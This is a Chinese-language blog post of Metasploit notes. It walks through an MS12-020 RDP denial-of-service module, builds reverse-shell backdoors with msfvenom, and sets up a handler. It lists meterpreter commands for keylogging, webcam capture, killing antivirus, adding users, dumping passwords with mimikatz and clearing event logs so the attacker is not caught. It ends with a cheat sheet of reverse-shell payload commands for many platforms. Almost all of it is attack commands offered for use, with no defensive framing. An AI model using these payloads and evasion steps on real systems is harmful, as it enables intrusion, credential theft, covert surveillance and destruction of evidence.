Metasploit笔记

来源:互联网 发布:大数据与网络安全论文 编辑:程序博客网 时间:2024/06/04 18:39

通俗使用方法

  1. 搜索需要的模块
    msf > search ms12-020

  2. 进入模块
    msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    msf auxiliary(ms12_020_maxchannelids)

  3. 查看需要填写的参数,这里需要填写靶机
    msf auxiliary(ms12_020_maxchannelids) > show options

  4. 设置参数
    msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.116.129
    RHOST => 192.168.116.129

  5. 最后输入命令“run”,执行我们的auxiliary攻击模块:
    msf auxiliary(ms12_020_maxchannelids) > run

meterpreter使用方法

  1. 使用msfvenom生成后门
    msfvenom -p windows/meterpreter/reverse_tcp lhost=175.xxx.xxx.xxx lport=8081 -f hta-psh -o test.hta

  2. 后门在被攻击机上执行
    各种方法让后门在被攻击机上面运行

  3. 使用handler模块进行监听
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.2
    set LPORT 8081
    exploit

  4. 等待被攻击机连接即可

meterpreter常用命令

  • ‍‍‍‍‍‍Help:‍‍‍‍‍‍这个参数可以查看‍‍‍‍‍‍meterpreter‍‍‍‍的全部参数和英文解释‍‍

  • Background:‍‍‍‍‍‍‍‍‍‍‍‍这个命令可以让当前的会话在后台运行。从而进行新的渗透测试。如果想返回之前的会话,那么就输入‍‍‍‍‍‍‍‍‍‍‍‍sessions -i‍‍‍‍ 命令‍‍。

  • ‍‍‍‍‍‍Cat:‍‍‍‍这个命令可以查看目标系统的文件。这个命令和‍‍‍‍unix‍‍‍‍里面的‍‍‍‍cat‍‍‍‍命令有一样的效果。‍‍

  • ‍‍‍‍‍‍Clearev:‍‍‍‍‍‍‍‍‍‍这个命令很重要!如果你不想被查水表,当你对目标系统测试后,一定要输入‍‍clearev命令。这个命令可以清除系统,软件之类的所有登陆信息。目前我还没发现能够恢复这些登陆信息方法,所以这个指令很有用。‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Download:‍‍‍‍‍‍就是下载命令。输入这个命令可以下载目标系统的文件。‍‍‍‍‍‍

  • ‍‍‍‍‍‍Ls‍‍‍‍:‍‍‍‍‍‍这‍‍个命令就是列出当前所在路径下的文件目录。和‍‍‍‍‍‍‍‍‍‍‍l‍‍‍‍inux‍‍‍‍‍‍‍‍‍‍‍‍‍‍的‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍ls‍‍‍‍‍‍‍‍‍‍‍‍‍‍命令一样。‍‍‍‍‍‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Edit:‍‍‍‍‍‍‍‍这个是编辑命令。运用的是‍‍‍‍‍‍‍‍vim‍‍‍‍编辑器。‍‍

  • ‍‍‍‍‍‍Execute:‍‍‍‍‍‍‍‍这个是执行命令。可以先输入‍‍‍‍‍‍‍‍‍‍execute‍‍‍‍‍‍,然后回车查看这个命令更详细的信息。‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Getuid:‍‍‍‍这个命令可以查看‍‍‍‍‍‍meterpreter‍‍‍‍‍‍所在的用户组,或者说是你目前所拥有的权限。‍‍‍‍‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Hashdump:‍‍‍‍‍‍这个属于一个‍‍‍‍‍‍post‍‍‍‍模块,要配合‍‍‍‍‍‍‍‍meterpreter‍‍‍‍‍‍使用。这个模块可以获取目标系统的哈希值。

  • ‍‍‍‍‍‍Idletime:‍‍‍‍‍‍‍‍‍‍输入这个指令可以查看目标系统运行了多长时间。‍‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Ipconfig:‍‍‍‍‍‍‍‍这个都不知道就不用往下看了。。。。。。‍‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Pwd:‍‍‍‍‍‍‍‍输出当前所在路径‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Cd:‍‍‍‍这个命令就是转到某个目录。和‍‍‍‍‍‍‍‍linux‍‍‍‍‍‍‍‍里面的‍‍‍‍cd‍‍‍‍‍‍命令一样。‍‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Lpwd:‍‍‍‍‍‍显示本地目录。也就是你自己所在的自己系统的位置。‍‍‍‍

  • ‍‍‍‍‍‍Lcd:‍‍‍‍‍‍‍‍‍‍进入本地目录。也就是进入你自己系统的目录。‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Migrate:‍‍‍‍这个是一个‍‍‍‍‍‍‍‍POST‍‍‍‍‍‍‍‍模块。可以将‍‍‍‍‍‍‍‍meterpreter‍‍‍‍‍‍当前的进程移动到一个新的进程。主要用来防软杀,或者进程不稳定的时候使用这个模块。使用‍‍‍‍‍‍“‍‍‍‍‍‍‍‍run ‍‍‍‍‍‍post/windows/manage/migrate”‍‍‍‍‍‍‍‍‍‍这个命令即可。‍‍‍‍‍‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Ps:‍‍‍‍这个命令可以查看目标系统的所有进程。这个命令很有用。如果你没有‍‍‍‍‍‍root‍‍‍‍权限或者‍‍‍‍‍‍administrator‍‍‍‍‍‍‍‍‍‍‍‍‍‍权限,‍‍‍‍你可以先查看进程,随后根据进程分析目标系统运行了什么软件。随后可以查找哪些软件有命令执行漏洞用来提权。甚至你还可以查看到目标系统用什么数据库之类的等等。‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍

  • ‍‍‍‍‍‍Search:‍‍‍‍这个命令可以帮助我们搜索目标系统的一些文件。我一般都用来查找备份的数据库文件。‍‍‍‍

  • ‍‍‍‍‍‍Shell:‍‍‍‍这个命令可以在目标系统打开一个命令行窗口。‍‍‍‍ ‍‍

  • Upload‍‍:‍‍这个命令可以上传一些文件‍‍。‍

  • keyscan_start # 开启键盘记录
    keyscan_dump #查看键盘记录内容
    keyscan_stop #关闭键盘记录

  • run getgui -e 启用远程桌面

  • run getgui -u XXX -p XXX 添加用户

  • screenshot 截屏

  • ‍‍‍‍‍‍webcam_list‍‍:‍‍这个命令可以查看目标机器上是否有网络摄像头,并且列举出来。‍‍‍‍‍

  • ‍‍‍‍‍‍webcam_snap‍‍:‍‍这个命令主要是远程连接目标系统的摄像头。大家可以使用‍‍‍‍webcam_snap –h‍‍‍‍查看更详细的参数。‍‍‍‍ ‍‍

  • Run killav‍‍‍‍:‍‍这个命令可以关闭对方的软杀‍‍‍‍‍‍‍‍‍

meterpreter下使用mimikatz

  1. 提升权限
    • >getsystem
  2. 获取windows密码
    • >load mimikatz
    • >msv(查看hash)
    • >kerberos(查看明文密码)
  3. 其他用法
    • >help mimikatz

附上常用后门生成命令
Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh 

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl 

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php 
原创粉丝点击